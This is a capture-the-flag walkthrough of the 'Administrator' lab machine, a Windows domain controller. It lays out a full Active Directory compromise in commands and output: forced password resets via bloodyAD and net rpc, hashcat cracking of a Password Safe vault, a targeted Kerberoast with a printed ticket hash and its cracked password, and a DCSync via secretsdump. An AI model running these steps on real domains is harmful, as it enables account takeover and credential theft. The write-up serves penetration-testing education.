Administrator

SUMMARY

This is a Windows Server 2022 machine. Starting from provided credentials we are able to enumerate the domain with BloodHound CE and move laterally abusing GenericAll and ForceChangePassword edges. Eventually, we end up in an account that has access to an FTP server where we find a Password Safe backup that, once cracked, provides credentials that allow collecting the user flag.

Regarding escalation, the process is the same. We move laterally by enumerating with BloodHound CE and taking advantage of GenericWrite and GetChangesAll edges. We abuse them by means of a targeted kerberoasting and a DCSync attack respectively, and finally we are able to find administrator's hash.

KEYWORDS

BloodHound CE enumeration, GenericAll, ForceChangePassword, bloodyAD, net rpc, Password Safe, GenericWrite, targeted kerberoasting, GetChangesAll, DCSync attack.

REFERENCES

https://www.pwsafe.org

https://www.thehacker.recipes/ad/movement/dacl/targeted-kerberoasting#targeted-kerberoasting

https://github.com/ShutdownRepo/targetedKerberoast

https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync

ENUMERATION

Port scan.

> for ports in $(nmap $target -p- --min-rate=5000 -Pn --open --reason | grep open | awk -F "/" '{print $1}' | tr '\n' ',' | sed s/,$//); do nmap $target -p$ports -sV -sC -Pn -vv -n && echo "\nList of open ports: $ports";done
 
Starting Nmap 7.93 ( https://nmap.org ) at 2025-01-25 19:01 GMT
Nmap scan report for 10.10.11.42
Host is up, received user-set (0.053s latency).
Scanned at 2025-01-25 19:01:22 GMT for 66s
PORT      STATE SERVICE       REASON  VERSION
21/tcp    open  ftp           syn-ack Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-01-26 02:06:35Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
63633/tcp open  msrpc         syn-ack Microsoft Windows RPC
63636/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
63645/tcp open  msrpc         syn-ack Microsoft Windows RPC
63652/tcp open  msrpc         syn-ack Microsoft Windows RPC
63655/tcp open  msrpc         syn-ack Microsoft Windows RPC
63668/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
|_clock-skew: 7h05m07s
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 35406/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 20522/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 52572/udp): CLEAN (Timeout)
|   Check 4 (port 52617/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
|   date: 2025-01-26T02:07:27
|_  start_date: N/A
 
Nmap done: 1 IP address (1 host up) scanned in 66.53 seconds
 
List of open ports: 21,53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49667,63633,63636,63645,63652,63655,63668

Looks like a domain controller. We have credentials for olivia:ichliebedich, update hosts file and enumerate SMB.

> smbmap -H administrator.htb -P 445 -u olivia -p ichliebedich
[+] IP: administrator.htb:445   Name: unknown
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share
        SYSVOL                                                  READ ONLY       Logon server share

Nothing useful here. Use credentials to dump additional domain usernames.

> crackmapexec smb administrator.htb -u olivia -p ichliebedich --rid-brute | cut -d \\ -f 2 | awk -F ' ' {'print $1}' | tr '[:upper:]' '[:lower:]' > userlist

And to remotely collect domain data with BloodHound-CE-Python.

> python3 /home/kali/.local/bin/bloodhound-ce-python -u olivia -p 'ichliebedich' -c All -d administrator.htb -ns 10.10.11.42

In BloodHound CE we inspect outbound edges from olivia@administrator.htb and notice she has GenericAll over michael@administrator.htb

USER

We will start by moving laterally to michael. Having GenericAll over him, there two ways to do it.

First option is with net user. Notice olivia is member of the Remote Management Users group, meaning we can have an Evil-WinRM session using her credentials.

Just open a shell and change michael password with net user

> evil-winrm -i administrator.htb -u olivia -p ichliebedich 
 
> net user
 
User accounts for \\
 
-------------------------------------------------------------------------------
Administrator            alexander                benjamin
emily                    emma                     ethan
Guest                    krbtgt                   michael
olivia
The command completed with one or more errors.
 
> net user michael password123
The command completed successfully.

A second option would be to use bloodyAD, as in Certified.

> python3 /home/kali/.local/bin/bloodyAD -d administrator.htb -u olivia -p ichliebedich --host 10.10.11.42 set password michael 'password123'
[+] Password changed successfully!

Whatever the chosen option, now we can mark michael as "Owned" in BloodHound CE, and continue enumerating from there.

As michael it seems we have ForceChangePassword over benjamin

Although we can open a WinRM shell as michael, in this case we cannot change benjamin password with net user since ForceChangePassword does not allow it.

However, we still can do it remotely with bloodyAD.

> python3 /home/kali/.local/bin/bloodyAD -d administrator.htb -u michael -p password123 --host 10.10.11.42 set password benjamin 'password123'
[+] Password changed successfully!

Or with net rpc

> net rpc password "benjamin" "password123" -U "administrator.htb"/"michael"%"password123" -S "administrator.htb"

Back in BloodHound CE, mark benjamin as "Owned" and start enumerating from there.

He is member of Share Moderators, which suggests he may have specific permissions on the SMB or FTP server.

Let's try enumerating SMB with benjamin credentials.

> smbmap -H administrator.htb -P 445 -u benjamin -p password123
[+] IP: administrator.htb:445   Name: unknown                                          
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share
        SYSVOL                                                  READ ONLY       Logon server share

Nothing useful here. However, credentials work for the FTP server, and from there we can download the Backup.psafe3 file.

> ftp administrator.htb
Connected to administrator.htb.
220 Microsoft FTP Service
Name (administrator.htb:kali): benjamin
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
10-05-24  08:13AM                  952 Backup.psafe3
226 Transfer complete.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 3 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
952 bytes received in 0.04 secs (21.9634 kB/s)
ftp> exit
221 Goodbye.

This file is associated to the Password Safe password manager and can be cracked with module 5200.

> hashcat -m 5200 -a 0 Backup.psafe3 /usr/share/wordlists/rockyou.txt

With this password we can open the vault with Password Safe and dump another 3 credentials for usernames alexander@administrator.htb, emily@administrator.htb and emma@administrator.htb

And after a quick BloodHound CE enumeration of the three users, we see only emily@administrator.htb belongs to Remote Management Users

Just use her credentials to open a WinRM session.

An collect the user flag.

SYSTEM

Start from the emily shell and take the opportunity to enumerate the system.

> Get-ComputerInfo
 
WindowsBuildLabEx                                       : 20348.1.amd64fre.fe_release.210507-1500
WindowsCurrentVersion                                   : 6.3
WindowsEditionId                                        : ServerStandard
WindowsInstallationType                                 : Server
WindowsInstallDateFromRegistry                          : 10/4/2024 5:07:44 PM
WindowsProductId                                        : 00454-20165-01481-AA452
WindowsProductName                                      : Windows Server 2022 Standard
WindowsRegisteredOwner                                  : Windows User
WindowsSystemRoot                                       : C:\Windows
WindowsVersion                                          : 2009
OSDisplayVersion                                        : 21H2

Enumerate the emily account in BloodHound CE, she has GenericWrite over ethan

BloodHound suggests either a targeted kerberoast or a shadow credentials attack.

We can try a shadow credentials attack with Certipy, as we did in Week 1. EscapeTwo; however, it fails.

> sudo ntpdate 10.10.11.42 && certipy shadow auto -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb -dc-ip 10.10.11.42 -ns 10.10.11.42 -account ethan
[sudo] password for kali:
2025-01-26 21:44:05.372045 (+0000) +25230.779009 +/- 0.020212 10.10.11.42 s1 no-leap
CLOCK: time stepped by 25230.779009
Certipy v4.8.2 - by Oliver Lyak (ly4k)
 
[-] Got error: socket ssl wrapping error: [Errno 104] Connection reset by peer
[-] Use -debug to print a stacktrace

So let's try a targeted kerberoasting attack.

In a nutshell, in this attack we set a Service Principal Name in a target account, for which we have GenericWrite, converting it into a service account. Then we request an ST for the new service account and crack it offline with module 13100.

We will use the targetedKerberoast.py tool suggested by BloodHound CE. It automatically logs in using provided credentials and enumerate usernames over which the SPN can be overwritten, then an ST is requested. Finally, SPN is cleared so it is left in its original state.

> sudo rdate -n 10.10.11.42 && python3 /opt/kerberoast/targetedkerberoast.py -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb -d administrator.htb --dc-ip 10.10.11.42
Sun Jan 26 22:04:36 GMT 2025
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$Administrator.htb/ethan*$15ec7606ffa3297b86b280475f514f9c$2e4d87fb991fa421183d34d1f57dc6eff6cf90d47f165e99e8caa4042a91278d9ae1897d9b5bd1c4938ae952b02b253b63207405bb7f66b8509c614b4e8a0fe9bff6e4ae67a8c6df5ce80d08d1e2f0cc78389f94289f4fe121f402cf1d8a411db8e49116ae92534989d03f740899d01f2f264273ad4da38a5537fde4c4d629961839c4a7916a3f246240ce1e50602d648a17d05384131d1729c9debfe576e9a37bf347899896e9df8bec3b2ac16110da971e0142ef5435bb73ee2fca6baf923ad26540ff42b735d73ff730cdb075026d0646247db541b3c824a2c8fef6c72572d06c64f341778b0456cbf6376f22bc444228cc4fef86c8bb62093c7081daf6ab75c809508c2ca0ab0fe679e1dbbd753441316d58d1245fdcd9e1b8ef58faa2c71ae319296eeda923da7a42677e65a7ab048b694ea8f880bb021740f94eb4f9b1416d37cd75f41c2b9d045370890611857ae2576e117c1ca52de93918d7104e95c95cd130b2d06805d6c99d5c13b61ab0040f02117accc14a8ad06e2f6d66103c07e9e96a6a2a94f4a12e34e9c3f8b46a305e778a17958128465967076c0365d7c87bb6c517d8ab27d1a89f582a72e303bf0ac54c1c7d2fbe80b2500cab320cdbac803fdfa2c8a54e8db9870a5dd73193a85878752373da71d223e8cdd47dcd2ba3c3b353bc5f1af493da902c90b5a26a218aa6875ff9ffa5bc8bc2f1f90d65502819f01f3c8539950c1d905b2bd803145cfd603a6d75a654ce2c83210b59ed9e6c232841a7d6f5e706072e8e9ed38baaf4c04640841726e61a7f484e900ef1515480ba9b337f80c9cc9d0f974aff33b83897d340a925ab084d60914f708eb5cb917c91ecb362b490f2da965fc476956c7f2d9968ed61b10bdacd2c371955253ebbddfbfc97ee2b38badec0413bca0ec1e11aa44429c6d3d9ab73aaa4a1425fbf23123260c42ed28229e3b766ed0c5682eb6b097b315f72b8ce387978525b3800229f5a0980de2b1f947168c6956d06c8ad9178aefd34addba5e3c9f719619aa29301579cd426415ae8c9d832a93ce3beccf70b58340e949b12e9e6d9d7ef80a3b5852f0e372ba786237cb3f6b2a2738a3b70fd070f5ecd59e5cab52cb145113fc0f4832ba7adc297d6a01167773f9a9a3a5302a0c6a672b1437372d349752350778db5dcdb5f986a7b3110d2584d12a21d32960c061d0f5a60f182257b8954fcd13936b14ef1c6cd5396b2d3549971d83ef116fe4e65916c73f7d231e1c7c99bd82854b152c016f663ecc4c962a30dce3569f088398f8d230996901bfa72f3427ede4d73d1f7b8828fe098c958867c3bd9017002c3e74fbe73650d05228039b57c916ae017e89859afb79c9fb951c815476495819840ae9468fdb66d6ee687de54fed4724c77eee4bd4f9b4995005f644e2b1a58f87deb91088ec9e318fe9d1f6b34a33f6e2e001c2a0e3c0d7f463376a5e3827fadf2a88d6f79d73188b207e06b3207700a5929dd3b6d7fe47bb71402d1881a49a990f0472d912937b66825

Now crack the ST with module 13100.

> hashcat -m 13100 -a 0 -d 1 hash.txt .\rockyou.txt
OpenCL API (OpenCL 3.0 CUDA 11.4.264) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #1: NVIDIA GeForce GTX 980M, 8000/8192 MB (2048 MB allocatable), 12MCU
 
OpenCL API (OpenCL 1.2 ) - Platform #2 [Intel(R) Corporation]
=============================================================
* Device #2: Intel(R) HD Graphics 4000, skipped
* Device #3: Intel(R) Core(TM) i7-3740QM CPU @ 2.70GHz, skipped
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
 
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
 
Watchdog: Temperature abort trigger set to 90c
 
Host memory required for this attack: 105 MB
 
Dictionary cache hit:
* Filename..: .\rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
 
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$Administrator.htb/ethan*$15ec7606ffa3297b86b280475f514f9c$2e4d87fb991fa421183d34d1f57dc6eff6cf9
0d47f165e99e8caa4042a91278d9ae1897d9b5bd1c4938ae952b02b253b63207405bb7f66b8509c614b4e8a0fe9bff6e4ae67a8c6df5ce80d08d1e2f0cc78389f942
89f4fe121f402cf1d8a411db8e49116ae92534989d03f740899d01f2f264273ad4da38a5537fde4c4d629961839c4a7916a3f246240ce1e50602d648a17d05384131
d1729c9debfe576e9a37bf347899896e9df8bec3b2ac16110da971e0142ef5435bb73ee2fca6baf923ad26540ff42b735d73ff730cdb075026d0646247db541b3c82
4a2c8fef6c72572d06c64f341778b0456cbf6376f22bc444228cc4fef86c8bb62093c7081daf6ab75c809508c2ca0ab0fe679e1dbbd753441316d58d1245fdcd9e1b
8ef58faa2c71ae319296eeda923da7a42677e65a7ab048b694ea8f880bb021740f94eb4f9b1416d37cd75f41c2b9d045370890611857ae2576e117c1ca52de93918d
7104e95c95cd130b2d06805d6c99d5c13b61ab0040f02117accc14a8ad06e2f6d66103c07e9e96a6a2a94f4a12e34e9c3f8b46a305e778a17958128465967076c036
5d7c87bb6c517d8ab27d1a89f582a72e303bf0ac54c1c7d2fbe80b2500cab320cdbac803fdfa2c8a54e8db9870a5dd73193a85878752373da71d223e8cdd47dcd2ba
3c3b353bc5f1af493da902c90b5a26a218aa6875ff9ffa5bc8bc2f1f90d65502819f01f3c8539950c1d905b2bd803145cfd603a6d75a654ce2c83210b59ed9e6c232
841a7d6f5e706072e8e9ed38baaf4c04640841726e61a7f484e900ef1515480ba9b337f80c9cc9d0f974aff33b83897d340a925ab084d60914f708eb5cb917c91ecb
362b490f2da965fc476956c7f2d9968ed61b10bdacd2c371955253ebbddfbfc97ee2b38badec0413bca0ec1e11aa44429c6d3d9ab73aaa4a1425fbf23123260c42ed
28229e3b766ed0c5682eb6b097b315f72b8ce387978525b3800229f5a0980de2b1f947168c6956d06c8ad9178aefd34addba5e3c9f719619aa29301579cd426415ae
8c9d832a93ce3beccf70b58340e949b12e9e6d9d7ef80a3b5852f0e372ba786237cb3f6b2a2738a3b70fd070f5ecd59e5cab52cb145113fc0f4832ba7adc297d6a01
167773f9a9a3a5302a0c6a672b1437372d349752350778db5dcdb5f986a7b3110d2584d12a21d32960c061d0f5a60f182257b8954fcd13936b14ef1c6cd5396b2d35
49971d83ef116fe4e65916c73f7d231e1c7c99bd82854b152c016f663ecc4c962a30dce3569f088398f8d230996901bfa72f3427ede4d73d1f7b8828fe098c958867
c3bd9017002c3e74fbe73650d05228039b57c916ae017e89859afb79c9fb951c815476495819840ae9468fdb66d6ee687de54fed4724c77eee4bd4f9b4995005f644
e2b1a58f87deb91088ec9e318fe9d1f6b34a33f6e2e001c2a0e3c0d7f463376a5e3827fadf2a88d6f79d73188b207e06b3207700a5929dd3b6d7fe47bb71402d1881
a49a990f0472d912937b66825:limpbizkit
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ethan$ADMINISTRATOR.HTB$Administrator....b66825
Time.Started.....: Sun Jan 26 16:08:51 2025 (1 sec)
Time.Estimated...: Sun Jan 26 16:08:52 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (.\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 16938.7 kH/s (7.64ms) @ Accel:512 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 196608/14344384 (1.37%)
Rejected.........: 0/196608 (0.00%)
Restore.Point....: 0/14344384 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> piggy!
Hardware.Mon.#1..: Temp: 41c Util:  5% Core:1037MHz Mem:2505MHz Bus:16
 
Started: Sun Jan 26 16:08:49 2025
Stopped: Sun Jan 26 16:08:52 2025

Back again in BloodHound CE, we see ethan has GetChangesAll over administrator

Which essentially allows a DCSync attack with Impacket's secretsdump.py

> python3 /usr/share/doc/python3-impacket/examples/secretsdump.py administrator/ethan:'limpbizkit'@administrator.htb

The only thing that's left is to use administrator's hash to open a shell.

You are root.

PreviousRelease Arena NextAuthority

Last updated 10 months ago